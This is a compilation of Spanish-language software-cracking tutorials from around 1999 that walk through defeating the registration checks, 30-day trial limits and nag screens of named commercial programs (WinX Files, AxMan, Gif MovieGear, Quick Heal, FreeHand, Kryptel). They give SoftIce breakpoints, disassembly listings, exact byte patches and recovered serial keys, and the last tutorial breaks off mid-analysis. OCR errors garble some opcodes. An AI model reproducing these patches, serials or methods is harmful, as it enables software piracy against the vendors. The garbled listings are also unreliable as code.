Add --- Añadir mas Funciones tenemos una larga lista para añadir (dependiendo de las 
librerías .dll que utilice el programa pues añadimos)) 


Run ---- Ejecutar el programa que tenemos seleccionado, es muy importante para que nos 
sirva de algo el apis32 ir viendo en que momento de van ejecutando las funciones, que luego 
serán nuestros breakPoints en el soft. 


En nuestro caso cargamos el archivo Wxfile.exe como esta en la foto y pulsamos Run se 
empieza a ejecutar el programa y vemos como van apareciendo las funciones que utiliza, pero 
a nosotros nos interesa las funciones que utiliza cuando nos muestra la ventana de error 
tras intentar registrarnos, Ósea que vamos a WinX Files y pulsamos en el dibujo del cerdo, 
si! donde pone que tenemos 30 dias, nos sale la ventana de registro y rellenamos con lo que 
queramos, en mi caso pondre. 


User Name: karpoff 


Key: 14141414 


Fijaros bien en el apis32 en las funciones que se han ejecutado nos posicionamos en la 
ultima función (con el ratón) y nos preparamos para pulsar OK en la ventana de registro a 
la vez que vemos que función escupe cuando muestre la ventana de que hemos fallado en el 
registro, y la función ha sido CreateWindowExa pues este será nuestro BreakPoint. 
Cerramos todo y cargamos el archivo Wxfile.exe en el Softlce Pulsamos el botón de los 
engranajes nos sale la ventanita pulsamos aceptar y estamos en el softice, ahora tenemos 
que salir para rellenar los datos del registro así que pulsamos F5 o [CTRL+D], devuelta a 
Windows y con WinXfiles ejecutado , nada pues a rellenar con los datos anteriores y 
atención ahora tenemos que ponemos nuestro BreakPoint, pulsamos [CTRL+D] y de nuevo en el 
softice a poner el BP 

BPX createwindowexa 

Tenemos que volver al windows para pulsar OK en los datos del registro, ósea que de nuevo 
F5 o [CTRL+D], y cuando salgamos a Windows pulsamos OK en los datos y haber si hace efecto 
la función createwindowexa EXPLACHSSSS estamos en el Softlce concretamente en. 


USER32 ! CREATEWINDOWEXA 
015F:BFF55C65 B530.  --=---- AQUÍ 


Como veis si miráis la parte inferior derecha del softice veréis que nos encontramos dentro 
de la librería de Windows USER32.DLL a la cual Wxfile.exe a hecho una llamada a la función 
createwindowexa tenemos que saber que parte del código de nuestra víctima llamo a esta 
función pulsamos F12 y EXPLACHSSSS aparecemos en la rutina padre. 


015F:00416B99 ES66EAFEFF Call USER32!CREATEWINDOWEXA -— LLAMADA A LA FUNCION 
015F:00416B9E 8986C0000000 mov dword ptr [esi+000000C0], eax - ESTAMOS Aquí 


hemos dicho que intentaremos localizar el S/N valido rastreando los registros no¿? Bueno 
pues pulsar la tecla F2 y aparecen en la parte superior del SoftIice los registros con sus 
valores, ahora posamos el ratón sobre cualquiera de ellos por ejemplo EAX y pulsamos el 
botón derecho, se despliega un menú de opciones escogemos Display y rastreamos la ventana 
de datos ( la ventanita donde están los datos en caracteres) con las flechitas de 
movimiento de la ventana miramos hacia arriba y hacia abajo fijándonos en todo, atención 
pero rastreamos cada registro un poquitin para arriba y lo mismo hacia abajo, no os tiréis 
la de dios de tiempo, si no veis nada interesante al siguiente registro y hacéis lo mismo. 


Prestar especial atención si veis números o un cacho del nombre que metisteis entonces lo 
miráis mas detenidamente. Bueno y cuando llegueis a ESI y miréis un pelin hacia arriba 
veréis 3 códigos uno el [nuestro] otro compuesto por [letras, números y un par de 
Caracteres] y el ultimo todo [letras mayúsculas] apuntarlos y a probar. 

En efecto la clave es 


NAME: karpoff 
KEY: CERKTEFVUNQOJPHN 


Era lógico pensar que el código valido eran las 15 letras mayúsculas, ya 


que el otro código contenía un par de caracteres (! Que no suelen ser 
corrientes. 

Habéis visto lo fácil que puede ser encontrar un S/N sin seguir todos los 
procesos, cuando tengáis un programa para crackear hecharle imaginación 
crackear tiene que ser algo divertido. 

Llegados al n*12 de esta serie de manuales, me gustaría que me mandaseis 
sugerencias sobre como queréis que siga avanzando esto, si queréis 
proyectos con el Softlce o empezar con el SmartCheck (como el Softlce pero 
para visual basic) o manuales sobre como funcionan algunas herramientas de 
cracking. Lo dejo en vuestras manos. 

Un saludo para todos en especial los que me habeis participado activamente 
con sugerencias preguntas etc, 


Pues esto es todo. Que os a parecido.. interesante no¿? Como siempre mi mayor deseo es que 
entendáis esto como yo intento explicarlo. Es difícil escribir manuales creerme, pero 
mientras una sola persona los lea seguiré J 


Con cualquier duda mandarme un email, contesto a todos los email. 


Un saludo para todos/as (karpoff) 


Kf karpofffthotmail.com 


http://personal2.redestb.es/karpoff 


http://welcome.to/karpoff 


El uso de este material es solo para uso educativo, por ahora los cracks 
son ilegales cada cual es responsable del uso que le de a este tutorial, el 
autor no se hace responsable de nada. 


Tutorial Descargado de 


Protecciones Estupidas 


| Programa Axman v3.01 | W95 / WNT 
| Descripción Compresor 


Have you ever downloaded a program that 
you wanted to make a backup copy of only 
to realize that it was too large to fit onto a 
single floppy disk? Have you ever tried to 
email someone a large program only to have 
it not get there because of restrications that 
certain email servers make on the size of 
emails? Have you ever wanted to distibute 
files from your internet site but they are so 
large that people get frustrated trying to 
download them, having their connections 
lost and being forced to start over? 


Palabras del 
Autor 


If you answered yes to any of the questions 
above, then AxMan is the program for you! 


AxMan is a 32-bit windows application that 
will split any file into pieces. These pieces 
can then be later restored to recover the 
original file. 


| Ranking 154 1£SS 1544 15ód pay 


| Tipo Trial de 30 dias 
Url ¡ht ://Www.mosaicware.com 


| Protección Time Limit 30 Dias,Numero de Serie 


| Dificultad FA 


A v4.01, W32dasm v8.9, UltraEdit 
Herramientas 
v6.20b 
Objetivo Simular estar registrados,Encontrar el 
zerial 


| Cracker KOLGADO 
E Fecha 17 de Octubre de 1999 


Introduccion: 


He particionado este ¿¿tutorial??? en tres partes. 
*Primera Parte <con parche> 

“Segunda Parte<en ejecucion o sin parche> 

“Tercera Parte<Encontrando el Zeriall> (recomendado) 


Al Atake: 


Primera Parte 

Hacemos todo el proceso de desensamblado y luego buscamos en el string 
reference. Vemos unos cuantos interesantes(expired,invalid info,etc) .Las maneras 
de crackearlo son son practicamente infinitas,pero le daremos al "thank you 
for...'',doble click y alla vamos: 


:00406AAC 84C0 test al, al 
:00406AAE 6A30 push 00000030 
:00406AB0 7513 jne 00406AC5 


Possible StringData Ref from Data Obj ->"AxMan - Error 400" 
:00406AB2 688C084600 push 0046088C 
Possible StringData Ref from Data Obj ->"'Invalid Registration Information" 


:00406AB7 6868084600 push 00460868 
:00406ABC SBCE mov ecx, esi 
:00406ABE ESE67F0200 call 0042EAA9 
:00406AC3 EB7A jmp 00406B3F 


Referenced by a (U)nconditional or (Cjonditional Jump at Address: 
:00406AB0(C) 

Possible StringData Ref from Data Obj ->"AxMan" 

:00406AC5 686C034600 push 0046036C 


Possible StringData Ref from Data Obj ->"Thank you for registering your 
copy of AxMan" 


:00406ACA 6838084600 push 00460838--..------ > AQUI APARECEMOS. 


:00406A CF SBCE mov ecx, esi 
:00406AD1 ESD37F0200 call 0042 EAA9 
:00406AD6 ESB8A70200 call 00431293 


Un poco mas arriba esta el "invalid info", o sea que tenemos las dos caras de la 
moneda practicamente juntos, todavia un poco mas arriba un jne, doble click 
sobre el 

Jump to y nos lleva al "thank you...'' o sea q' en la linea :00406AB0 7513 jne 
00406ACS5, cambiar el 7513 por eb13 y el programa is cracked.Facil verdad. 


Segunda Parte(softice) 


Si eso te parecio muy facil o por si alguna obscura razon no tienes el w32dasm,aca 
va otra opcion igual de facil. 

En el programa, Help/Register....ponemos lo que se nos ocurra, bpx 
getdlgitemtexta,x,no pasa nada,probamos otro,bpx getwindowtextA,x, y ahora si, 
estamos adentro,F10 maniaticamente hata que nos salte la ventana "Invalid Info”, 
le damosok y estamos de vuelta en el soft nos vamos pa arriba hasta encontrar el 
jnz 

00406ac5,creo que no hace falta decir que hacer en esta situacion, o si??, 
simplemente poner un bc * y despues doble click en la linea del jnz que 
mencionamos 

hace un rato(pa poner un bpx).Correr de nuevo el programa y nos para, vemos 
que 

al lado dice no jump; ponemos r fl z y listo. 


Tercera Parte 


Pero todavia hay mas, tambien podemos conseguir el verdadero serial.Repetimos 
el 

proceso de ariba,pero en vez de poner el bpx en jnz lo ponemos en call que esta un 
poco mas arriba en 00406437 una vez alli FS para entrar en el llamado, 11 veces 
F10 

y tnemos Lea eax [esp+08],F10 una vez mas,ahora D eax y vemos 309-621-810.S1 
eso no es un serial q' me parta un rayo jeje... 

PD:El serial es valido para el nombre=danz,Company=my self, si introduces otros 
datos tendras un serial diferente. 

Saludos. 

FEELFREE-KOLGADO 


Karpoff Spanis 
Tutorial Descargado de o 


POST-MORTEM 


CRACKING 


"I "ILOVE THE DEAD" | THE DEAD" 


Ez Programa Gif MovieGear | eS ed aa ¿ 


| Descripción | Descripción [Animacion 


Ra PRO R 
| Tipo Trial de 30 dias,Serial 

Url http://www.gamani.com 
| Protección Time Limit 30 Dias,Numero de Serie 


| Dificultad Fa 
a v4.01, W32dasm v8.9, UltraEdit 
Herramientas 
v6.20b 
[Objetivo [Objetivo Simular estar registrados. estar ¡Simular estar registrados. 


| Cracker KOLGADO 
| Fecha 15 de Octubre de 1999 


Al Atake: 

Abrimos el programa en w32dasm,click en String Reference y buscamos por algo 
positivo,encontramos el "Expired trial version" le damos doble click i aparecemos 
aqui: 


:0042C571 C7053B8F8450000000000 mov dword ptr [0045F8B8], 00000000 
:0042C57B 85FF test edi, edi 

:0042C57D 7357 ¡ne 0042C5D6 

:0042C57F 6A30 push 00000030 


* Reference To: USER32.MessageBeep, Ord:01BDh 
:0042C581 FF1564144400 Call dword ptr [00441464] 


* Possible Reference to String Resource ID=40214: "Expired Trial Version" 


:0042C587 68169D0000 push 00009D16 --->"Aparecemos aqui" 
:0042C58C ES2FFFFDFF call 0040C4C0 


:0042C591 83C404 add esp, 00000004 


Notamos que un poco mas arriba esta un jne,le damos doble click y luego el boton 
jump to y nos lleva aqui: 


* Possible Reference to String Resource ID=40217: "Trial Version Reminder" 


:0042C5D6 68199D0000 push 00009D19-------- >'"Aqui" 
:0042C5DB ESEOFEFDFF call 0040C4C0 

:0042C5E0 83C404 add esp, 00000004 

:0042C5E3 50 push eax 

:0042C5E4 56 push esi 


* Reference To: USER32.SetWindowTextA, Ord:025Eh 


| 
:0042C5E5 FF1530144400 Call dword ptr [00441430] 
:0042C5EB 57 push edi 


* Possible Reference to String Resource ID=40218: ''Reminder: There are %d 
days remaining in your 30 day trial p" 


:0042C5EC 681A9D0000 push 00009D1A 
:0042C5F1 ESCAFEFDFF call 0040C4C0 
:0042C5F6 83C404 add esp, 00000004 


"Trial version reminder'' Hmmmm...si no me equivoco parece ser la rutina de 
habilitacion del programa. 

Cuando nos pasemos los 30 dias no va a hacer el salto y nos aparecera que 
debemos registrarnos para seguir usandolo,por lo tanto, 

cambiemos el salto condicional por uno incondicional. 

Le damos return el w32dasm para volver del salto,ahora nos fijamos en el offset. 
Abrimos nuestro hex editor favorito(en mi caso uedit32) en el offset 0002c57d(en 
mi pc,esto puede variar),cambiar el 75 por eb.La proteccion 

del trial ha sido deshabilitada. 


Ahora bien,el programa esta crackeado, pero al darle en help/about....obviamente 
nos sale el unregistered version,solo para ser un poco mas exquisitos y "limpiar" 
mas el programa 

vamos a hacer que se cambie este mensaje por "Registered version". 

En el string reference,buscamos "Registered version" ,doble click sobre ella y nos 
lleva aqui: 


:0040C11F 83F801 cmp eax, 00000001 
:0040C122 0F35E0000000 ¡ne 0040C208--------- >cambiar por nop 


:0040C128 8D8424B0000000 lea eax, dword ptr [esp+000000B0] 
:0040C13A 830408 add esp, 00000008 

:0040C13D 85CO0 test eax, eax 

:0040C13F 7547 jne 0040C188---->cambiar por nop 


* Possible StringData Ref from Data Obj ->"Registered Version" 


:0040C141 68F0454400 push 004445F0---------- >'"Aqui" 
:0040C146 689F040000 push 0000049F 

:0040C14B 56 push esi 

:0040C14C FFDS call ebp 

:0040C14E 6A00 push 00000000 

:0040C150 6840040000 push 000004A0 

:0040C155 56 push esi 

:0040C156 FFD7 call edi 


Inmediatamente arriba aparece un jne y un poco mas arriba otro. 

Podemos cambiar estos por nop para que el programa no salte.En nuestro hex 
cambiamos 

el 7547 por 9090 y el 0£35e0000000 cambiar por 909090909090.0k guardamos los 
cambios,en el programa le damos help/about.... 


Ahora solo nos falta el nagscreen del principio,vamos a usar el softice ahora para 
detectar que funcion genera la nag. 

Bpx CreateDialogBox,abrimos el programa y nada..,easy, no pasa naa,probemos 
con otro,bpx DialogboxparamaA, y bingo!!!.F12 y estamos en el interior 

de nuestra victima.Anotamos la direccion del call dialogboxparama,para 
referencia en el w32dasm. 

PD: El softice se necesita en este caso para referencia pues no sabemos cual de 
todas las funciones genera la nag y no 

perdernos en el listado muerto. 

Buscamos esta direccion en el w32dasm y vemos esto: 


:0042C6D5 8B542408 mov edx, dword ptr [esp+08] 
:0042C6D9 50 push €2axX--------=..........-- >nop 
:0042C6DA A188154600 mov eax, dword ptr [00461588] 
:0042C6DF 6880C44200 push 0042C480 

:0042C6E4 52 push edx---------- >nop 


* Possible Reference to Dialog: DialoglID_0092 


:0042C6E5 6892000000 push 00000092.------ >nop 


:0042C6EA 50 push eax------ >nop 


* Reference To: USER32.DialogBoxParamA, Ord:0093h 


:0042C6EB FF15F4124400 Call dword ptr [004412F4]---->nop ''Aqui 
aparecemos"' 

:0042C6F1 SE pop esi 

:0042C6F2 C20400 ret 0004 


Ahora solo nos resta deshacer el call y todos los push inmediatamente por encima 
de este(5 push). 

Ahora tenemos un supuesto ''Full registered version" del programa.,sin ningun 
indicio q' nos diga lo contrario. 


| FEELFREE-KOLGADO 
Karpoff Spanis 
Tutorial Descargado de o 


Crackeando Quick Heal 


La victima: Quick Heal 

URL: www.quickheal.com 

Descripcion: Excelente virus scanner 

Dificultad: Principiante 

Objetivo: Simular estar registrado 

Cracker: Kolgado 

Ponemos un numero cualquiera,control-d y nos salta el softice,bpx getdlgitemtexta 

pa' probar y x, volvemos al programa,le damos ok y nos salta de nuevo el soft,un f12 y estamos en la 
rutina del programa,a partir de ahi podemos seguir dos caminos, 

analizar minuciosamente y ver como se comporta el codigo(útil si queremos un KeyGen.),o probamos 
darle fanaticamente f10 hasta que nos aparezca el mensaje de "error en el codigo" o algo por el estilo. 
Para no complicarnos demasiado(y porque tambien soy bastante nuevo para un keygen),probemos nuestra 
suerte con la segunda opcion. 

Le damos f10 19 veces, y a la 20 nos aparece la ventana "incorrect unlock code",le damos aceptar y 
aparecemos en: 


:00408D27 6880134400 push 00441380 


* Possible StringData Ref from Data Obj ->"Incorrect unlock code." 


:00408D2C 6818244400 push 00442418 
:00408D31 E824D30100 call 00426054 


* Possible Reference to Dialog: DialoglID_0066, CONTROL_ID:0458, "" 


:00408D36 6858040000 push 00000458 "AQUI APARECEMOS" 


:00408D3B 8BCE mov ecx, esl 


:00408D3D E8C7580100 call 0041E609 
:00408D42 85C0 test eax, eax 
:00408D44 7504 jne 00408D4A 
:00408D46 33C0 Xor eax, eax 
:00408D48 EB03 jmp 00408D4D 


El call inmediatamente arriba de donde aparecimos fue el que provocó el mensaje, por lo tanto, 
busquemos un poco arriba para ver q' tenemos(hay q! buscar algun salto condicional). 


:00408CBO 50 push eax 

:00408CB 1 51 push ecx 

:00408CB2 ES6ECDFFFF call 00405A25 
:00408CB7 83C408 add esp, 00000008 
:00408CBA 83F801 cmp eax, 00000001 
:00408CBD 7564 jne 00408D23 "LA CLAVE" 
:00408CBF E833CEFFFF call 00405AF7 
:00408CC4 E8438EFFFF call 00401B0C 
:00408CC9 663D0200 emp ax, 0002 
:00408CCD 7549 jne 00408D18 
:00408CCF FF761C push [esi+1C] 


No necesitamos ir muy lejos y nos encontramos un ¡nz 00408d18 y un poco mas arriba jnz 
00408d23,ahora bien, esto no nos dice nada por si solo, 

asi que analicemos un poco.Si nos fijamos en j¡nz 00408d23(en w32dasm jne) nos damos cuenta de que en 
caso de hacer el salto apareceriamos unas cuantas 

instrucciones antes de nuestro famoso call q' produce el mensaje de error,exactamente en: 


:00408D21 EB31 jmp 00408D54 
:00408D23 6A30 push 00000030 "AQUI" 
:00408D25 8BCE mov ecx, esi 


* Possible StringData Ref from Data Obj ->"Error" 


:00408D27 6880134400 push 00441380 


* Possible StringData Ref from Data Obj ->"Incorrect unlock code." 


:00408D2C 6818244400 push 00442418 
:00408D31 E824D30100 call 0042605A "NUESTRO MARTIRIO" 


Tambien podemos notar que inmediatamente arriba de push 30 esta un ¡mp que evitaria pasar por el call 
"de los lamentos". 

por lo que a simple vista pareceria ser que nuestro 00408cbd jnz 00408d23 seria lo q' distingue de estar o 
no registrados.Pero antes de sacar conclusiones a la ligera, probemos. 

Ponemos un bc*, y luego un bpx en 00408cbd,le damos control-d,le damos ok de nuevo a nuestra ventana 
de Registro y nos baramos en el bpx que hemos puesto. 

Vemos que realmente va a saltar,como suponiamos,asi q' probemos,total no perdemos nada (creo).En le 
softice le damos r fl z y se convierte "magicamente" en un "no jump”. 

Ok el momento de la verdad,le damos bc*, y luego x, y pam!!!, un lindo mensaje... "Quick Heal has been 
upgrade to a complete..."No sweat.Ni siquiera necesitamos parcharlo,solo un cambio en un salto en tiempo 
de ejecucion y listo. 

Esperando que les sirva de ayuda.Atte. Kolgado. 

PD:Esta es la manera mas facil y es genial para los nuevos,si se animan le pueden dar con el 
keygen.Gracia a todos en el spanish reverse... 

FreeMind. 


FreeHand $.0.1 


| Plataformas WO95 


Descripción ¡Editor de imagenes,texto,dibujo,etc. | 


Tipo 'Trial de 30 dias 


Url | Ihttp://www.macromedia.com 


Protección Limite de 30 Dias 

Dificultad ¡Amateur 

Herramientas [Softlce v4.01, W32dasm v8.9, UltraEdit v6.20a 
Objetivo ¡Romper el limite de 30 dias 

Cracker KOLGADO 


Fecha 21/22 de Octubre de 1999 


Al Atake: 


Para empezar adelantamos la fecha unos 35 dias,corremos el programa y nos sale 
la nag con dos botones,el try(deshabilitado) y el exit.Le damos exit y volvemos la 
fecha a la actual, corremos de nuevo el programa y nos sale una ventana chiquita 
que nos dice que Warning quisimos hacer trampa,bla,bla,bla... o sea que hay algo 
que le avisa al programa que el trial expiro, y por mas que alteremos la fecha 
sigue expirado.OKk, softice time, ponemos un bpx enablewindow, F12 una vez, y 
estamos adentro y vemos una llamada al user32!'DialogboxparamaA (aqui se 
genera la ventana del Warning),asi que vamos a poner un nop en este call y en los 
push inmediatamente superiores.Anotamos la direccion y vemos el offset con el 
w32dsm: 


:0040828C 8815628D4300 mov byte ptr [00438D62], dl 
:00408292 6A00 push 00000000 

:00408294 68B06D4000 push 00406DB0 

:00408299 6A00 push 00000000 


* Possible Reference to Dialog: DialogID_0072 


:0040829B 6A72 push 00000072 
:0040829D 50 push eax 


* Reference To: USER32.DialogBoxParamA, Ord:008Eh 
| 


:0040829E FF1588954400 Call dword ptr [00449588]-------- >aparecemos aca 
:004082A4 83F806 cmp eax, 00000006 

:004082A7 0F34EA000000 je 00408397 

:004082AD E9CC000000 jmp 0040837E 


En el hex cambiamos desde el offset 00007692 hasta 000076434 por 90, y luego 
salvamos los cambios, corremos el programa y chau,chau ventana, y ademas nos 
habilita el programa tambien!!!;.., o sea que ahora hemos tenido una mejora, si 
nos pasamos del trial, retrocedemos la fecha del sistema y nos va a habilitar igual, 
en este punto si sos caigije(expresion usada en mi pais que equivale a no querer 
hacer nada), te puedes conformar con esto que es lo minimo, o si te gusta 
experimentar con lo desconocido, seguí (elegi esto ultimo):) 

Nos vamos al "futuro' de nuevo y ahi esta otra vez esa nag,bueno, vamos a ver 
que nos dice la ''autopsia”,,,,en el w32dsm,buscamos el string expired: 


:00405FDD 891D9C654300 mov dword ptr [0043659C], ebx 
:00405FE3 755C jne 00406041 

:00405FES 3935800E4400 cmp dword ptr [00440E80], esi 
:00405FEB 741A je 00406007 

:00405FED A120BB4300 mov eax, dword ptr [0043BB20] 
:00405FF2 50 push eax 


* Possible StringData Ref from Data Obj ->"%s Expired" 


| 

:00405FF3 6800C44200 push 0042C400--ooooo====- > aqui 
5:00405FF8 6840794300 push 004379A0 

:00405FFD ESBE9A0100 call 0041FACO 

:00406002 83C40C add esp, 0000000C 

:00406005 EB4C jmp 00406053 


Los dos saltos inmediatamente superiores son tentadores pero creo que no pasa 
nada con ellos (al menos para mi) los analice y no vale la pena entrar en detalles. 
Bue..:) 55 instrucciones mas arriba esta una instruccion interesante : 


:00405F2B 8B442410 mov eax, dword ptr [esp+10] 

:00405F2F 83C0FE add eax, FFFFFFFE 

:00405F32 83F8S1E cmp eax, 0000001 E<---------=========- cambiar 83f81e por 83£800 
:00405F35 0F8794020000 ja 004061 CE<ooooccccccccoccccnmnnnmn 

:00405F3B 33C9 xor ecx, ecx 

:00405F3D 8A88F4614000 mov cl, byte ptr [eax+004061F4] 

:00405F43 FF248DE0614000 ¡mp dword ptr [4*ecx+004061E0] 

:00405F4A A1ECCE4300 mov eax, dword ptr [0043CEEC] 


Vemos una comparacion de el valor de eax con 1e<30 en decimal> podria ser por 
los 30 dias del trial .Ponemos un bpx en la direccion del ja para ver que onda, y 
notamos que no va a saltar y como nuestra trial esta expirado tenemos que 
invertir < a la mas pura Ingenieria Inversa> 

para estar bien. 

El valor de eax en esa comparacion si no recuerd9o mal es 6 y tiene que ser major 
a 30 para que salte,para esto facilmente podemos cambiar el 1le por 00 y siempre 
saltara ,,pero antes de eso vamos a ver si estamos en lo cierto. 

Como es un ja las flag c y z deben estar en cero para ocasionar el salto , hacemos 
que salte y le damos x y enter y ¡¡¡pam!!! el invitado se ha presentado:) muy bien.,,, 
ahora que estamos seguros vamos a hacer el cambio definitivo. 

Abrimos nuestro hex y hacemos los cambios (creo que no es necesario explicar 
comom parchar con el hex pues ya ha sido explicado en otros 
tutoriales),,,corremos el programa,,,Oh no algo pasa, el famoso mensaje de 
windoze de volcado de pila,pero no nos desesperemos,,,por la pinta lo mas 
probable es que al alterar el codigo hace un rato, provoco otro cambio en algun 
lugar del exe.Para ver donde el error, en la ventanita que nos aparece le damos 
click en detalles y nos proporciona la direccion donde se produjo el "error 
fatal".La direccion es 0040512 ponemos en el soft un bpx en dicha direccion y : 


:00405127 6A 04 push 00000004 

:00405129 ES92A 80100 call 0041F9C0 

:0040512E OFAFC7 imul eax, edi--------- >cambiar Ofafc7 por 909090 

:00405131 OFAFC6 imul eax, esi---------- >cambiar Ofafc6 por 909090 

:00405134 830404 add esp, 00000004 

:00405137 85CO0 test eax, eax 

:00405139 C70064000000 mov dword ptr [eax], 00000064------- > Aqui aparecemos 
:0040513F 7409 je 0040514A 


Vemos que eax tiene un valor de 00000000, ahora volvamos al editor hex y 
cambiemos el le por 00 de hace un rato a como estaba antes es decir 00 por 
1e,corremos de nuevo el programa y nos debe parar el soft , ahora bien, notas la 
diferencia que provoco el error???, el valor de eax ahora es 00cc05b0.Cinco 
instrucciones mas arriba hay un call vamos a poner un nuevo bpx en esa 
instruccion para ver con que valor sale eax. 

Oli pum!! pantallazo y estamos en el soft le damos F10 y nos vamos a la 
primera multiplicacion imul eax, edi, vemos que el valor de eax es 00ccO5b0(el 
numero que evitaria generar el error) o sea que al salir del call el valor de eax es el 
correcto pero se vuelve cero por culpa de las multiplicaciones,probablemente sea 
una comprobacion o algo asi,no le entiendo el significado ,lo que si se es que si 
evitamos las multiplicaciones el valor de eax=00cc05b0 que es lo q' queremos. 
En el cuadro de instrucciones estan los detalles que hay que cambiar en el hex y 


ademas cambiamos el ya famoso 1e por 00 de nuevo para probar si anda el 
parche. 

Corremos el programa ...... y el maldito error otra vez:(... vamos a ver si es en la 
misma direccion,, vemos en detalles y es en otra direccion:004025de,vamos en un 
flash a €Sa.......... 

Mmmmmmz.... un momento,...... Si!!!! es la misma rutina que el error anterior esta 
la asignacion a eax de 64,mas arriba las dos multiplicaciones y el call,por lo tanto 
repitamos el proceso anterior, las dos imul por nop, ok ,vamos a probar, 


PD: Espero que a alguien le sirva este texto, me parece que esta muy improvizado 
pero me costo un monton. 
Hasta la proxima. 


FeelFree... 


Karpoff Spanis 
Tutorial Descargado de o 


TuTOrial Spud (diciembre '99) 


KRIPTEL V3.5 


http:/ / download.cnet.com/ downloads/ 0,10152,0-10105-101-1500144,00.html?gid=551766€tag=st.dl.10105- 
100-1500144.qf.10105-101-1500144 


INTRODUCCION 


Hola que tal, esta es la primera vez que me decido a hacer un tutorial. 
La verdad es que soy un taco de vago para escribir, pero los 
conocimientos hay que compartirlos sino se te pudren en la cabeza, como 
bien dijo alguien por ahí ;)) 


Bueno, este programa es un encriptador/desencriptador, yo ni siquiera 
se usarlo (tampoco me he puesto) pero es uno de otros tantos programas 
que 


mi colega Killman se entretiene en buscarme pa que yo lo destripe y 
aprenda un poquito mas ;) (Grasia Gitano :P) 


Se trata de una proteccion Cinderella de 30 dias, con una Nag de 
entrada avisandote de los dias que faltan para el fatidico petado de 
programa y una Nag despues de introducir los datos de registro, 
avisandote de que los datos introducidos se comprobaran la proxima vez 
que lo ejecutes y tal 


Bueno, empecemos: 


Para empezar hay que instalarlo, ejecutamos Kryptel.exe y lo instalamos 
obteniendo brw.exe. 


Ejecutamos bre.exe y antes de comenzar ya aparece la primera Nag 
avisandonosde que tenemos 30 dias para registrarlo. Bien, le damos a 
continuar y entramos en el programa. Nos vamos a la ventana de registro 
Help/Registration Code y probamos un nombre y serie aleatorio. Yo he 
puesto Spud y 123456. Pulsamos en registrar y nos da un mensage 
avisandonos de que el numero de serie tiene un formato erroneo, el cual 
debe ser tal que asi XXXX-XXXX-XXXXXXXX. Po guay, trabajo que nos 
ahorra el programador para cuando tengamos que sacar un numero de serie 
valido ;) 


Ok, seguimos. Ponemos de nuevo Spud y este serial 1234-5678-12345678 y 


le damos a registrar, ahora nos aparece una ventanita dandonos las 
gracias por registrar el producto y bla bla bla que el codigo de 
registro que has introducido se comprobara cuando reinicies el programa 
y que sabras si es correcto o no cuando aparezca tu nombre (Spud) en la 
ventana de About. Vale, reiniciamos el programa, vamos a about y como 
es natural seguimos sin estar registrados. 


Muy bien, ya hemos tanteado el programa, ya sabemos que el codigo 
introducido o bien se guarda en algun lugar del ordenador o bien el 
codigo se procesa, se comprueba el serial y se guarda un flag de 
"Registro aceptado" en ese lugar del ordenador. En cualquiera de los 
dos casos ese lugar puede ser el registro de sistema, el propio 
ejecutable o algun archivo de inicializacion. Lo mas usual siempre es 
el registro de sistema asi que me voy al W32Dasm y busco en las 
Imported Functions alguna funcion referente al registro de sistema de 
entre todas encuentro 


GetPrivateProfileStringA y 


SetPrivateProfilesStringA 


Vale, estas funciones lo que hacen simplemente es introducir en un 
directorio del registro de sistema una Cadena de caracteres. Una vez 
cerrado y abierto el programa por primera vez puedes irte al registro 
de sistema y buscar por ejemplo la cadena "Kryptel" hasta que 
encuentres la zona de nuestro programa. El buscador del registro de 
sistema se para un par de veces, miramos y no encontramos nada que nos 
interese, la tercera vez que se para lo hace en 

"HKEY_ LOCAL MACHINEASoftwarexINV softworks1Kryptel" miramos dentro y 
podemos ver que se encuentran almacenados en forma de Cadena de texto 
nuestro serial y nuestro nombre. Esto quiere decir que los datos 
introducidos en la ventana de registro se almacenan en el registro de 
sistema y son recuperados luego por el programa cuando se ejecuta de 
nuevo, para procesarlos y decidir si el programa se registra o no. 


Llegado a este punto comence a poner breackpoints del tipo BPX 
WritePrivateProfileStringA IF *(*(ESP+4))= =“RegC” y BPX 
GetPrivateProfileStringA IF *(* (ESP+4))= =“RegC” (la metodologia de 
estos Breackpoints la podeis comprender en el tutorial de "Crack en 
colores de E+P") para interrumpir el programa en los accesos de 
lectura/escritura del registro de sistema con respecto a nuestro 
serial. Podria explicaros mas a fondo en que consiste esto, pero la 
verdad es que llegado a este punto la cosa se me empezo a complicar, y 
decidi cambiar de estrategia. 


(Si tienes tiempo y mas experiencia que yo quizas te interese continuar 


7) 
Otra estrategia 


Como lo de seguir el calculo del serial no me fue muy bien, decidi ir a 
por la proteccion temporal, asi que busque en el W32Dasm algunas 
funciones de acceso al reloj del sistema y me tope con las siguientes: 


GetSystemTimeAsFileTime, GetTickCount y GetTimeFormat 


GetTickCount cuenta los milisegunos pasados desde que se inicio 
Windows, GetTimeFormat formatea una zona de memoria para ser usada por 
una variable de tiempo y GetSystemTimeAsFileTime, que es la que nos 
interesa, obtiene la fecha y hora actual en el formato de Tiempo 
Coordinado Universal (ke koño significara esto XD) la funcion se 
declara asi: 


VOID GetSystemTimeAsFileTime ( 


LPFILETIME l1pSystemTimeAsFileTime // Puntero a una estructura de 
archivo de tiempo 


); 


Estructuta de archivo de tiempo: 


typedef struct _FILETIME ( 


DWORD dwLowDateTime; 


DWORD dwHighDateTime; 


) FILETIME; 


En resumen el primer parametro que se le pasa a la funcion 
GetSystemTimeAsFileTime es un puntero hacia una estructura de 8 byes 
(doble DWORD) en la que se encuentra codificada la fecha y la hora 
actual. 


Asi pues entramos en accion abriendo el Softlce (CTRL+D) y poniendo un 
BPX GetSystemTimeAsFileTime. Luego ejecutamos el Kryptel y caemos 
dentro de la funcion. Pulsamos F12 y entramos en el KERNEL, pulsamos 
otra vez y seguimos en el KERNEL asi que F5 para continuar, la segunda 
vez ocurre lo mismo y es que se trata de dos comprobaciones iniciales 
de la fecha para algo relacionado con la carga del fichero para la 


ejecucion. La tercera vez que el Sice corta en esta funcion pulsamos 
F12 y aparecemos en el codigo del kryptel (BRW.EXE) Justamente aquí: 


:00403A2E 68901A4100 push 00411A90 KA Puntero al FILETIME 


* Reference To: KERNEL32.GetSystemTimeAsFileTime, Ord:0137h 


:00403A33 FF1510364100 Call dword ptr [00413610] 


:00403A39 3935081C4100 cmp dword ptr [00411C08], esi 


echamos un vistazo a la direccion 411A90 y vemos los 8 bytes del 
filetime 


:d 411A90 


167:411A90 60 83 04 D9 99 20 BF 01 por supuesto en tu ordenador sera 
diferente. 


Bueno, ponemos un BPR 167:411A90 167:411A90+7 RW para que el Sice pare 
cada vez que se lee o escribe en esa zona de la memoria. Pulsamos F5 y 
se para en 403EF8: 


